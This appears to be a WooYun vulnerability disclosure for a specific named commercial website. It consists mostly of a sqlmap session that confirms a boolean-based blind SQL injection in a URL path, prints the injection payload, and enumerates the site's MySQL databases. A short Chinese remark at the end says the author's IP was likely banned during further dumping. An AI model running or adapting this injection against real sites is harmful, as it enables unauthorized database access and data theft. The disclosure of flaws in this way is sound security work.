WooYun.org

问题URL：http://www.juesheng.com/zhuanti/aodaliyatouziyimin
D:\tools\sqlmapproject-sqlmap-21481df>python sqlmap.py -u "http://www.juesheng.c
om/zhuanti/aodaliyatouziyimin*" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:06:50
custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q] y
[10:06:53] [INFO] resuming back-end DBMS 'mysql'
[10:06:54] [INFO] testing connection to the target url
[10:06:56] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.juesheng.com:80/zhuanti/aodaliyatouziyimin' AND 8935=893
5 AND 'wDAQ'='wDAQ
---
[10:06:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5
[10:06:56] [INFO] fetching database names
[10:06:56] [INFO] fetching number of databases
[10:06:56] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
sqlmap got a 302 redirect to 'http://www.juesheng.com/404.html'. Do you want to
follow? [Y/n] n
3
[10:07:07] [INFO] retrieved: i
[10:08:00] [CRITICAL] connection timed out to the target url or proxy. sqlmap is
going to retry the request
nformation_schema
[10:12:07] [INFO] retrieved: juesheng_sh
[10:14:59] [CRITICAL] connection timed out to the target url or proxy. sqlmap is
going to retry the request
o
[10:15:58] [CRITICAL] connection timed out to the target url or proxy. sqlmap is
going to retry the request
p
[10:16:13] [INFO] retrieved: tes
[10:17:25] [CRITICAL] connection timed out to the target url or proxy. sqlmap is
going to retry the request
t
available databases [3]:
[*] information_schema
[*] juesheng_shop
[*] test
跑表的时候估计给我ip封了，没做过多尝试，家里没水表，谢谢